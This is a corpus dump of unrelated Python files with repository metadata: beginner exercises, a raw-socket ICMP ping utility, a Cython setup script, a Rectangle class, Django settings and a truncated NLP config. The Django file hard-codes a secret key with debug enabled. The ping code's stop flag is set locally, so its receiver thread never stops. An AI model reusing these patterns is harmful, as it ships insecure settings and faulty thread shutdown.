    :param fruits: list of fruits (mutated in place)
    :return: None
    """
    rejected = []
    for fruit in list(fruits):
        while True:
            answer = input(f"Do you like {fruit}?").lower().strip()
            if answer == 'yes':
                break
            if answer == 'no':
                rejected.append(fruit)
                break
            print(f"Please choose from the following: yes|no")
    for fruit in rejected:
        fruits.remove(fruit)
def main():
    # Interactive driver: walks through exercise series 1-4 on a fruit list.
    """
    Series 1
    * Create a list that contains “Apples”, “Pears”, “Oranges” and “Peaches”.
    * Display the list (plain old print() is fine…).
    * Ask the user for another fruit and add it to the end of the list.
    * Display the list.
    * Ask the user for a number and display the number back to the user and the fruit corresponding to that number
    (on a 1-is-first basis). Remember that Python uses zero-based indexing, so you will need to correct.
    * Add another fruit to the beginning of the list using “+” and display the list.
    * Add another fruit to the beginning of the list using insert() and display the list.
    * Display all the fruits that begin with “P”, using a for loop.
    """
    fruits = ["Apples", "Pears", "Oranges", "Peaches"]
    display_fruits(fruits)
    fruits.append(input("Which fruit would you like to add?\n\n >>>"))
    display_fruits(fruits)
    number = int(input("Please enter a number: \n\n >>>"))
    # Correct the 1-based user answer to a 0-based index.
    print(f"You entered {number}, which corresponds with {fruits[number - 1]}")
    fruits = list([input("Enter another fruit: \n\n >>>")]) + fruits
    display_fruits(fruits)
    fruits.insert(0, input("Enter another fruit: \n\n >>>"))
    print("Fruits in list with 'P' in name:")
    for fruit in fruits:
        if "p" in fruit[0].lower():
            print(fruit)
    """
    Series 2
    Using the list created in series 1 above:
    * Display the list.
    * Remove the last fruit from the list.
    * Display the list.
    * Ask the user for a fruit to delete, find it and delete it.
    * (Bonus: Multiply the list times two. Keep asking until a match is found. Once found, delete all occurrences.)
    """
    display_fruits(fruits)
    fruits.pop()
    display_fruits(fruits)
    delete_fruits(fruits)
    display_fruits(fruits)
    """
    Series 3
    Again, using the list from series 1:
    * Ask the user for input displaying a line like “Do you like apples?” for each fruit
    in the list (making the fruit all lowercase).
    * For each “no”, delete that fruit from the list.
    * For any answer that is not “yes” or “no”, prompt the user to answer with one of those
    two values (a while loop is good here)
    * Display the list.
    """
    cleanup_list(fruits)
    display_fruits(fruits)
    """
    Series 4
    Once more, using the list from series 1:
    * Make a new list with the contents of the original, but with all the letters in each item reversed.
    * Delete the last item of the original list. Display the original list and the copy.
    """
    reversed_fruits = [fruit[::-1] for fruit in fruits]
    fruits.pop()
    print(f"Original list: {fruits}")
    print(f"Reversed list: {reversed_fruits}")
if __name__ == '__main__':
    # Run the interactive exercises only when executed as a script.
    main()
| [
"brian_s_ervin@hotmail.com"
] | brian_s_ervin@hotmail.com |
eb8b87f9fd89d79fac86f787705c74ddeba99724 | c65bb08796e5a4880c69223deddfd7685e15889b | /ex40/mystuff.py | 301a33b92d4436d5560e534400e01439c083400e | [] | no_license | cdemeke/Learn-Python-The-Hard-Way | 5f9ff9b87a5c2d8b61c55af318b75ff0a738ed80 | 3e7b2d13657bb1c77e9bcd95c7a105e2fd23914d | refs/heads/master | 2021-01-01T05:37:18.909735 | 2014-12-06T00:32:38 | 2014-12-06T00:32:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | py | def apple():
print "I AM APPLES!"
tangerine = "Living reflection of a dream"
class MyStuff(object):
def __init__(self):
self.tangerine = "And now a thousand years between"
def apple(self):
print "I AM CLASSY APPLLES!"
| [
"demeke2@gmail.com"
] | demeke2@gmail.com |
8266cfb6cd8c7007d5ace9e2bb96a4ea77988892 | 07ef6594a8ba03e64b9acf56f7a11dbf0057a25a | /ping_sweep/reference_ideas/ping_C.py | ff4b2b6c481c836588ead503a0f2328d500270fd | [
"BSD-2-Clause-Views"
] | permissive | Python3pkg/Ping_Sweep | 75fe3c1497bb14ebf412f09a983b67e26b286f60 | 323487b32e747ee35d4d50e3ed0ae6ebb487b42d | refs/heads/master | 2021-01-21T17:41:10.186951 | 2017-05-21T18:53:27 | 2017-05-21T18:53:27 | 91,979,995 | 0 | 0 | null | 2017-05-21T18:50:52 | 2017-05-21T18:50:52 | null | UTF-8 | Python | false | false | 13,825 | py | #!/usr/bin/env python
"""
A pure python ping implementation using raw socket.
Note that ICMP messages can only be sent from processes running as root.
Derived from ping.c distributed in Linux's netkit. That code is
copyright (c) 1989 by The Regents of the University of California.
That code is in turn derived from code written by Mike Muuss of the
US Army Ballistic Research Laboratory in December, 1983 and
placed in the public domain. They have my thanks.
Bugs are naturally mine. I'd be glad to hear about them. There are
certainly word - size dependenceies here.
Copyright (c) Matthew Dixon Cowles, <http://www.visi.com/~mdc/>.
Distributable under the terms of the GNU General Public License
version 2. Provided with no warranties of any sort.
Original Version from Matthew Dixon Cowles:
-> ftp://ftp.visi.com/users/mdc/ping.py
Rewrite by Jens Diemer:
-> http://www.python-forum.de/post-69122.html#69122
Rewrite by George Notaras:
-> http://www.g-loaded.eu/2009/10/30/python-ping/
Revision history
~~~~~~~~~~~~~~~~
December 18, 2009
-----------------
awolfson@amperion.com
amperion.com
Alex Wolfson:
Added tracking of duplicate ICMPs
Added sending multiple pings from a thread scheduled with defined interval.
Added printing histogram
Added command line options
November 8, 2009
----------------
Improved compatibility with GNU/Linux systems.
Fixes by:
* George Notaras -- http://www.g-loaded.eu
Reported by:
* Chris Hallman -- http://cdhallman.blogspot.com
Changes in this release:
- Re-use time.time() instead of time.clock(). The 2007 implementation
worked only under Microsoft Windows. Failed on GNU/Linux.
time.clock() behaves differently under the two OSes[1].
[1] http://docs.python.org/library/time.html#time.clock
May 30, 2007
------------
little rewrite by Jens Diemer:
- change socket asterisk import to a normal import
- replace time.time() with time.clock()
- delete "return None" (or change to "return" only)
- in checksum() rename "str" to "source_string"
November 22, 1997
-----------------
Initial hack. Doesn't do much, but rather than try to guess
what features I (or others) will want in the future, I've only
put in what I need now.
December 16, 1997
-----------------
For some reason, the checksum bytes are in the wrong order when
this is run under Solaris 2.X for SPARC but it works right under
Linux x86. Since I don't know just what's wrong, I'll swap the
bytes always and then do an htons().
December 4, 2000
----------------
Changed the struct.pack() calls to pack the checksum and ID as
unsigned. My thanks to Jerome Poincheval for the fix.
Last commit info:
~~~~~~~~~~~~~~~~~
$LastChangedDate: $
$Rev: $
$Author: $
IP Header
bit offset 0-3 4-7 8-15 16-18 19-31
0 Version Header length Differentiated Services Total Length
32 Identification Flags Fragment Offset
64 Time to Live Protocol Header Checksum
96 Source Address
128 Destination Address
160 Options/Data
RFC792, echo/reply message:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identifier | Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data ...
+-+-+-+-+-
"""
import os, sys, socket, struct, select, time, threading, traceback
import collections
from optparse import OptionParser
#import pprint
#pp = pprint.PrettyPrinter(indent=4)
#from multiprocessing import Process
# From /usr/include/linux/icmp.h; your milage may vary.
ICMP_ECHO_REQUEST = 8 # Seems to be the same on Solaris.
'''
sentPings -> sequence:time
records are created during the send and delited during the receive
printStat() deletes records that are timed out
'''
# Outstanding echo requests: ICMP sequence number -> send timestamp.
sentPings = {}
# Guards sentPings and the statistics objects across sender/receiver threads.
statLock = threading.Lock()
class pingStatistics:
    """Accumulates ping counters, RTT min/max/average and an RTT histogram."""
    def reset(self):
        # Zero all counters and the histogram; called at the start of a run
        # and whenever the moving-window statistics are printed.
        self.starttime = time.time()
        self.transmitted = 0
        self.received = 0
        self.duplicated = 0
        self.missed = 0
        self.pending = 0
        self.min = 10000.0
        self.max = 0.0
        self.totaltime = 0.0
        self.exceedmaxtime = 0
        self.lastPrinttime = time.time()
        if hasattr(self, 'hist'):
            self.hist = [0 for h in self.hist]
    def __init__(self, dest_addr, points):
        # points: sorted histogram bucket boundaries in milliseconds; hist
        # gets one extra bucket for values beyond the last boundary.
        self.reset()
        self.dest_addr = dest_addr
        self.points = points
        self.hist = [0] * (len(self.points)+1)
        # self.printafter = 10
    def updateStat(self, val):
        '''
        update a histogram with val
        points is a sorted list
        @return: new histogram
        '''
        # val is a round-trip time in seconds; buckets are in milliseconds.
        # statLock.acquire()
        valms = val * 1000
        i = 0
        for p in self.points:
            if valms >= p:
                i += 1
            else:
                break
        self.hist[i] += 1
        self.totaltime += val
        self.received += 1
        if self.min > val:
            self.min = val
        if self.max < val:
            self.max = val
        # statLock.release()
    def printHist(self):
        # Print bucket counts, then the bucket boundaries underneath.
        for h in self.hist:
            print "%10d" % (h),
        print "\n" + " "*7,
        for p in self.points:
            print "%10.3f" % (p),
        print "\n"
    def printStat(self):
        # Expire pings older than the timeout, then print a summary line
        # plus the histogram.
        print "---- " + self.dest_addr + " ping statistics ----"
        statLock.acquire()
        currentTime = time.time()
        pending = 0
        # print sentPings
        pings = sentPings.keys()
        for seq in pings:
            tm = sentPings[seq]
            if (currentTime - tm > options.timeout) and tm > self.starttime:
                # print 'before print del %d'%seq
                del sentPings[seq]
                # print 'after print del %d'%seq
                self.missed += 1
            else:
                pending += 1
        # print 'after for loop'
        statLock.release()
        print "time = %f sec, %d transmitted, %d received, %d duplicated, %d missed, %d pending, %f min, %f max %d exceed %f ms, " \
            % (time.time() - self.starttime, self.transmitted, self.received, self.duplicated, self.missed, pending, self.min * 1000.0, self.max * 1000.0, self.exceedmaxtime , options.maxtime * 1000),
        if self.received != 0:
            print "%f average" % (self.totaltime / self.received * 1000.0)
        else:
            print ""
        self.printHist()
        self.lastPrinttime=currentTime
#global statistics, movingstat, continue_receive, statLock
# Flag polled by the receiver thread; cleared by do_many() to stop it.
continue_receive = True
# From http://code.activestate.com/recipes/142812/
# Translation table mapping non-printable bytes to '.' for hex dumps.
FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
def dump2(src, length=8):
    """Return a classic hex + ASCII dump of *src*, *length* bytes per row."""
    result=[]
    for i in xrange(0, len(src), length):
        s = src[i:i+length]
        hexa = ' '.join(["%02X"%ord(x) for x in s])
        printable = s.translate(FILTER)
        result.append("%04X %-*s %s\n" % (i, length*3, hexa, printable))
    return ''.join(result)
def checksum(source_string):
    """
    I'm not too confident that this is right but testing seems
    to suggest that it gives the same answers as in_cksum in ping.c
    """
    # 16-bit one's-complement sum over the packet (Internet checksum).
    sum = 0
    countTo = (len(source_string)/2)*2
    count = 0
    while count<countTo:
        # little-endian pairing of bytes; the final byte-swap compensates
        thisVal = ord(source_string[count + 1])*256 + ord(source_string[count])
        sum = sum + thisVal
        sum = sum & 0xffffffff # Necessary?
        count = count + 2
    if countTo<len(source_string):
        # odd-length input: add the trailing byte on its own
        sum = sum + ord(source_string[len(source_string) - 1])
        sum = sum & 0xffffffff # Necessary?
    sum = (sum >> 16) + (sum & 0xffff)
    sum = sum + (sum >> 16)
    answer = ~sum
    answer = answer & 0xffff
    # Swap bytes. Bugger me if I know why.
    answer = answer >> 8 | (answer << 8 & 0xff00)
    return answer
def send_one_ping(my_socket, dest_addr, ID, size):
    """
    Send one ping to the given >dest_addr<.
    """
    dest_addr = socket.gethostbyname(dest_addr)
    # Header is type (8), code (8), checksum (16), id (16), sequence (16)
    my_checksum = 0
    seqH = statistics.transmitted & 0xffff # sequence has signed short format
    # Make a dummy header with a 0 checksum.
    header = struct.pack("!bbHHH", ICMP_ECHO_REQUEST, 0, my_checksum, ID, seqH)
    bytesInDouble = struct.calcsize("d")
    data = (size - bytesInDouble) * "Q"
    timeSent = time.time()
    # Payload starts with the send timestamp so the receiver can compute RTT.
    data = struct.pack("d", timeSent) + data
    # Calculate the checksum on the data and the dummy header.
    my_checksum = checksum(header + data)
    # Now that we have the right checksum, we put that in. It's just easier
    # to make up a new header than to stuff it into the dummy.
    header = struct.pack(
        "!bbHHH", ICMP_ECHO_REQUEST, 0, my_checksum, ID, seqH
    )
    packet = header + data
    # Record the send time before transmitting; the receiver thread and
    # printStat() both consult sentPings.
    sentPings[seqH] = timeSent
    my_socket.sendto(packet, (dest_addr, 1)) # 1 is a port number
    statistics.transmitted += 1
    movingstat.transmitted += 1
    #DEBUG
    #if options.verbose > 1:
    #    print "at %f sent seq=%u" % (timeSent, seqH)
def verbose_receive_one_ping(my_socket, ID, timeout):
    """
    receive the ping from the socket.
    update statistics

    Returns the RTT in seconds, -1 for a duplicate, or None on timeout.
    """
    global statLock
    timeLeft = timeout
    while True:
        startedSelect = time.time()
        whatReady = select.select([my_socket], [], [], timeLeft)
        howLongInSelect = (time.time() - startedSelect)
        if whatReady[0] == []: # Timeout
            return
        timeReceived = time.time()
        recPacket, addr = my_socket.recvfrom(2048) #TODO: find a better way to specify size.
        # Skip the 20-byte IP header; the ICMP header is the next 8 bytes.
        icmpHeader = recPacket[20:28]
        type, code, checksum, packetID, sequence = struct.unpack(
            "!bbHHH", icmpHeader
        )
        if options.verbose > 2:
            print 'recPacket (len = %d)\n' % (len(recPacket)), dump2(recPacket)
        if packetID == ID:
            if type != 0: #not a reply msg
                print "Got not a 'reply' msg: type %d, code %d\n" % (type, code)
                continue
            bytesInDouble = struct.calcsize("d")
            # The payload starts with the send timestamp written by
            # send_one_ping.
            timeSent = struct.unpack("d", recPacket[28:28 + bytesInDouble])[0]
            # TODO:update statistic
            rtt = timeReceived - timeSent
            if options.verbose > 1:
                print "at %f received %d bytes from %s: time=%.3f, seq=%u, rtt=%.3f ms" % (timeReceived, len(recPacket),
                    addr, timeSent - statistics.starttime, sequence, rtt*1000),
            statLock.acquire()
            if sequence in sentPings:
                #print 'receive del'
                del sentPings[sequence]
                statistics.updateStat(rtt)
                movingstat.updateStat(rtt)
                if rtt > options.maxtime:
                    statistics.exceedmaxtime += 1
                    movingstat.exceedmaxtime += 1
                if options.verbose > 1:
                    print ""
                statLock.release()
                return rtt
            else: # Duplicate ICMP
                if options.verbose > 1:
                    print " (DUP)"
                statistics.duplicated += 1
                movingstat.duplicated += 1
                statLock.release()
                return -1
            # NOTE(review): unreachable — both branches above return.
            statLock.release()
        timeLeft = timeLeft - howLongInSelect
        if timeLeft <= 0:
            if options.verbose > 1:
                print "nothing received in %f sec\n" % (timeout)
            # statistics.missed += 1
            return
def receive_loop(my_socket, my_ID, timeout):
    ''' This is a thread routine'''
    # Runs until the main thread clears the module-level continue_receive flag.
    while continue_receive:
        verbose_receive_one_ping(my_socket, my_ID, timeout)
def ping_with_stat(my_socket, dest_addr, my_ID, size, interval, timeout):
    # Send a single echo request, then sleep for the inter-ping interval.
    send_one_ping(my_socket, dest_addr, my_ID, size)
    time.sleep(interval)
def do_many(dest_addr, interval = 1.0, timeout = 1.0, count = 1, size = 56):
"""
sends packets in a main loop with delays.
receive packets from the thread
This allows send packets independently of receiving
Returns either the delay (in seconds) or none on timeout.
"""
global statistics, movingstat
movingstat.reset()
statistics.reset()
icmp = socket.getprotobyname("icmp")
try:
# my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
except socket.error, (errno, msg):
if errno == 1:
# Operation not permitted
msg = msg + (
" - Note that ICMP messages can only be sent from processes"
" running as root."
)
raise socket.error(msg)
raise # raise the original error
my_ID = os.getpid() & 0xFFFF
receiveThread = threading.Thread(target = receive_loop, args = (my_socket, my_ID, timeout))
receiveThread.start()
if count == -1:
i=0
while 1:
if not receiveThread.isAlive():
break
i = i + 1
ping_with_stat(my_socket, dest_addr, my_ID, size, interval, timeout)
if time.time() - movingstat.lastPrinttime >= options.printinterval:
if options.verbose > 0:
movingstat.printStat()
movingstat.reset()
statistics.printStat()
else:
for i in xrange(1, count+1):
if not receiveThread.isAlive():
break
ping_with_stat(my_socket, dest_addr, my_ID, size, interval, timeout)
if time.time() - movingstat.lastPrinttime >= options.printinterval:
if options.verbose > 0:
movingstat.printStat()
movingstat.reset()
statistics.printStat()
continue_receive = False
time.sleep(timeout) # to be sure that all sent pings are processed
receiveThread.join(timeout)
statistics.printStat()
my_socket.close()
#=================================================================
if __name__ == '__main__':
    # Command-line entry point: parse options, run the ping loop, and
    # report statistics.  Exit status: 0 on success / Ctrl-C, 1 on error.
    try:
        usage = "%prog [options]IP\n %prog -h for more inormation"
        parser = OptionParser()
        parser.usage = usage
        parser.add_option("-c", "--count", dest="count", type='int', help="number of pings. -1: infinity, default=%default", default=-1)
        parser.add_option("-i", "--interval", dest="interval", type='float', help="ping interval in sec, default = %default", default = 1.0)
        parser.add_option("-t", "--timeout", dest="timeout", type='float', help="ping timeout in sec, default = %default", default = 1.0)
        parser.add_option("-p", "--printinterval", dest="printinterval", type='float', help="statistics print interval in sec, default = %default", default = 5.0)
        parser.add_option("-s", "--size", dest="size", type='int', help="payload size, default = %default", default = 56)
        parser.add_option("-m", "--maxtime", dest="maxtime", type='float', help="numer of ping greater then maxtime sec, default = %default", default = 0.025)
        # parser.add_option("-d", "--histdim", dest="histdim", type='int', help="payload size, default = %default", default = 56)
        parser.add_option("-g", "--hist", dest="hist", type='float', nargs = 11, help="histogram points, default = %default", default = (5.0, 10.0, 15, 20.0, 30.0, 40.0, 50.0, 100, 200, 300, 500))
        parser.add_option("-v", "--verbose", dest="verbose", type='int', help="0: only final stat; 1: final and intermediate stat; \n2: 1 + individual packets, default=%default; 3: 2 + receive packet dump", default=2)
        (options, args) = parser.parse_args()
        if args == []:
            parser.error('Provide Target IP')
        targetIP = args[0]
        statistics = pingStatistics(targetIP, options.hist)
        movingstat = pingStatistics(targetIP, options.hist)
        #movingstat.printafter = int(options.printinterval / options.interval)
        #if movingstat.printafter < 1: movingstat.printafter = 1
        do_many(targetIP, interval = options.interval, timeout = options.timeout, count = options.count, size = options.size)
    except KeyboardInterrupt:
        # Ctrl-C is the normal way to stop an infinite run: report and
        # exit successfully.
        print
        statistics.printStat()
        sys.exit(0)
    except:
        traceback.print_exc()
        # BUG FIX: exit with status 1 only on a real error.  The old
        # 'finally: sys.exit(1)' clobbered every exit code -- including
        # the sys.exit(0) above -- so the script always reported failure.
        sys.exit(1)
| [
"pierre.villeneuve@gmail.com"
] | pierre.villeneuve@gmail.com |
886eea49aa337110c363a7c50f02dc38adcdecb0 | d710f84e7ac099925fb926527474e59f01da55a9 | /ch09-generative_models/yahmm/setup.py | db193aab9a00323c85f178605855741eb39c310f | [
"Apache-2.0"
] | permissive | skforest/linear_start_code | 838c1d6123202d6fd7531ffd77bf5fcc6fad3b4e | 478a6b236c2e33c4baffec8aafa8e0a8ed68dca8 | refs/heads/master | 2020-07-18T13:54:05.585117 | 2019-09-04T10:06:42 | 2019-09-04T10:06:42 | 206,258,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 864 | py | # -*- coding: UTF-8 -*-
"""
此脚本将使用Cython编译viterbi.pyx
"""
import os
from Cython.Build import cythonize
from distutils.core import setup
import numpy
# Windows下的存储路径与Linux并不相同
# 在Windows下使用Cython请参考https://github.com/cython/cython/wiki/InstallingOnWindows
if os.name == "nt":
setup(
name="yahmm",
description="Yet another hmm implimentation for supervised",
packages=["yahmm"],
ext_modules=cythonize(["hmm\\utils\\viterbi.pyx"]),
requires=["sklearn"],
include_dirs=[numpy.get_include()])
else:
setup(
name="yahmm",
description="Yet another hmm implimentation for supervised",
packages=["yahmm"],
ext_modules=cythonize(["hmm/utils/viterbi.pyx"]),
requires=["sklearn"],
include_dirs=[numpy.get_include()])
| [
"1025284664@qq.com"
] | 1025284664@qq.com |
f828bed2965fc5649b5ddb773d2883da6a7e2660 | 0387ad7384c45e67635f494b866da594970c2917 | /0x0C-python-almost_a_circle/models/rectangle.py | 9fc5bbd228f3c0083aa1b9d254c29a15184a9f88 | [] | no_license | monicajaimesc/holbertonschool-higher_level_programming | 2ef992de0eefd4205df7d98c653ca352b408e91b | ed80e375274d1d8a80882c2e5a7a7df09ae0833e | refs/heads/master | 2020-07-23T01:45:17.542210 | 2020-02-14T03:34:52 | 2020-02-14T03:34:52 | 207,404,393 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,478 | py | #!/usr/bin/python3
"""
Module that contain a Class Rectangle
inherits from Base, private instance attributes
width and height
"""
from models.base import Base
class Rectangle(Base):
    """Rectangle shape; id management is inherited from Base."""

    def __init__(self, width, height, x=0, y=0, id=None):
        """Validate/store the size and position, then let Base assign id.

        Args:
            width (int): horizontal size, must be > 0.
            height (int): vertical size, must be > 0.
            x (int): horizontal offset, must be >= 0.
            y (int): vertical offset, must be >= 0.
            id: identifier forwarded to Base (auto-assigned when None).
        """
        # Assignment order matters: validation errors are raised in the
        # order width, height, x, y -- same as the attribute list.
        self.width = width
        self.height = height
        self.x = x
        self.y = y
        super().__init__(id)

    @staticmethod
    def _check_dimension(name, value):
        """Raise unless value is a strictly positive int (width/height)."""
        if type(value) is not int:
            raise TypeError('{} must be an integer'.format(name))
        if value <= 0:
            raise ValueError('{} must be > 0'.format(name))

    @staticmethod
    def _check_position(name, value):
        """Raise unless value is a non-negative int (x/y)."""
        if type(value) is not int:
            raise TypeError('{} must be an integer'.format(name))
        if value < 0:
            raise ValueError('{} must be >= 0'.format(name))

    @property
    def width(self):
        """int: horizontal size of the rectangle (> 0)."""
        return self.__width

    @width.setter
    def width(self, value):
        self._check_dimension('width', value)
        self.__width = value

    @property
    def height(self):
        """int: vertical size of the rectangle (> 0)."""
        return self.__height

    @height.setter
    def height(self, value):
        self._check_dimension('height', value)
        self.__height = value

    @property
    def x(self):
        """int: horizontal offset of the rectangle (>= 0)."""
        return self.__x

    @x.setter
    def x(self, value):
        self._check_position('x', value)
        self.__x = value

    @property
    def y(self):
        """int: vertical offset of the rectangle (>= 0)."""
        return self.__y

    @y.setter
    def y(self, value):
        self._check_position('y', value)
        self.__y = value

    def area(self):
        """Return the area of the rectangle."""
        return self.width * self.height

    def display(self):
        """Print the rectangle with '#', honouring the x/y offsets."""
        # y blank lines first, then 'height' rows of 'width' hashes,
        # each row shifted right by x spaces.
        print('\n' * self.y, end='')
        row = ' ' * self.x + '#' * self.width
        for _ in range(self.height):
            print(row)

    def __str__(self):
        """Return '[Rectangle] (<id>) <x>/<y> - <width>/<height>'."""
        return "[Rectangle] ({}) {}/{} - {}/{}".format(
            self.id, self.x, self.y, self.width, self.height)

    def update(self, *args, **kwargs):
        """Update attributes from *args (id, width, height, x, y, in
        that order) or, when no positional args are given, from
        **kwargs.  Positional arguments win; unknown keywords are
        silently ignored.
        """
        names = ('id', 'width', 'height', 'x', 'y')
        if args and len(args) > 0:
            for name, value in zip(names, args):
                if name == 'id':
                    # Route through Base so None keeps its auto-id logic.
                    super().__init__(value)
                else:
                    setattr(self, name, value)
        elif kwargs and len(kwargs) > 0:
            for key, value in kwargs.items():
                if key == 'id':
                    super().__init__(value)
                elif key in names:
                    setattr(self, key, value)

    def to_dictionary(self):
        """Return the dictionary representation of this Rectangle."""
        return {key: getattr(self, key)
                for key in ('id', 'width', 'height', 'x', 'y')}
| [
"monikmaja@gmail.com"
] | monikmaja@gmail.com |
009b4f13692b0d7f54b6afcab42e518641201b36 | b46e1451bae53c36a8bc1b51de985eb5ce3472c0 | /doc_orginal/en/example/py2py3/test_py3.py | d95702a5348ad01e6f11db6fdf5536060bb8bfa9 | [
"MIT"
] | permissive | 19-1-skku-oss/2019-1-OSS-L1 | d0c2eaa4fab205a89ea3b8c1c8383e681ec22b98 | 3c8b78a0aa1f75001967d8e477e1c452c11bc7cb | refs/heads/master | 2021-06-24T17:12:08.137915 | 2020-12-09T08:35:24 | 2020-12-09T08:35:24 | 181,665,631 | 3 | 5 | MIT | 2020-09-03T23:45:18 | 2019-04-16T10:14:56 | Python | UTF-8 | Python | false | false | 104 | py | def test_exception_syntax():
try:
0 / 0
except ZeroDivisionError as e:
assert e
| [
"37352771+mjyoo2@users.noreply.github.com"
] | 37352771+mjyoo2@users.noreply.github.com |
66bc1e90fe7cca9c35983b5f447c943e4ff61a43 | 17b36a72ec5d6287499d9468dbeafbc5bcbbd5fc | /plant_base/settings.py | 7585b1e6f0392b408b1187856653dd9382df8d13 | [
"MIT"
] | permissive | nord-PRJ/plant-base | 95be30c4e5f31e7f0c836725fda0b02c3b196d23 | 183060bef9e6fb85730db4549c89127be390d7d1 | refs/heads/master | 2020-03-07T22:38:28.836973 | 2018-04-02T17:56:05 | 2018-04-02T17:56:05 | 127,759,594 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,100 | py | """
Django settings for plant_base project.
Generated by 'django-admin startproject' using Django 2.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): hard-coded key is fine for local dev only -- load from an
# environment variable before deploying.
SECRET_KEY = '7cx#rf%m01j6_cm0wgq3vi1@qtzew*#-ds*%^#pj679*(cc-q+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty list: only localhost-style hosts are served while DEBUG is True.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'plant_base.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'plant_base.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
# Default: file-based SQLite next to manage.py (development setup).
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
| [
"ttkay123@gmail.com"
] | ttkay123@gmail.com |
72d8d8ac47ceb9f682800efef9aa102bd121eab5 | caa06eca3eef2549d5088f6487201f734b35822e | /NLP-PGN/utils/config_bak.py | 538451b3b9977af8e798069ab9f3e4cf5672d3bb | [] | no_license | kelvincjr/shared | f947353d13e27530ba44ea664e27de51db71a5b6 | 4bc4a12b0ab44c6847a67cbd7639ce3c025f38f8 | refs/heads/master | 2023-06-23T19:38:14.801083 | 2022-05-17T09:45:22 | 2022-05-17T09:45:22 | 141,774,490 | 6 | 1 | null | 2023-06-12T21:30:07 | 2018-07-21T02:22:34 | Python | UTF-8 | Python | false | false | 1,767 | py | """
@Time : 2021/2/814:06
@Auth : 周俊贤
@File :config.py
@DESCRIPTION:
"""
from typing import Optional
import torch
# General model dimensions.
hidden_size: int = 512
dec_hidden_size: Optional[int] = 512
embed_size: int = 512
# Enable the pointer (copy) mechanism.
pointer = True
# Data
max_vocab_size = 20000
embed_file: Optional[str] = None # use pre-trained embeddings
source = 'big_samples' # use value: train or big_samples
data_path: str = './data/data/train.txt'
val_data_path = './data/data/dev.txt'
test_data_path = './data/data/test.txt'
stop_word_file = './data/data/HIT_stop_words.txt'
max_src_len: int = 300 # exclusive of special tokens such as EOS
max_tgt_len: int = 100 # exclusive of special tokens such as EOS
truncate_src: bool = True
truncate_tgt: bool = True
min_dec_steps: int = 30
max_dec_steps: int = 100
enc_rnn_dropout: float = 0.5
enc_attn: bool = True
dec_attn: bool = True
dec_in_dropout = 0
dec_rnn_dropout = 0
dec_out_dropout = 0
# Training
trunc_norm_init_std = 1e-4
# NOTE(review): 1e-31 is unusually small for a numerical-stability
# epsilon -- confirm this is intentional (1e-13/1e-12 is more common).
eps = 1e-31
learning_rate = 0.001
lr_decay = 0.0
initial_accumulator_value = 0.1
epochs = 8
batch_size = 8 #16
# Feature flags; they also determine model_name below.
coverage = False
fine_tune = False
scheduled_sampling = False
weight_tying = False
max_grad_norm = 2.0
is_cuda = True
DEVICE = torch.device("cuda" if is_cuda else "cpu")
LAMBDA = 1
output_dir = "./output"
# Derive a model name from the enabled feature combination (used for
# checkpoint naming).  Precedence: pointer variants first, then baseline.
if pointer:
    if coverage:
        if fine_tune:
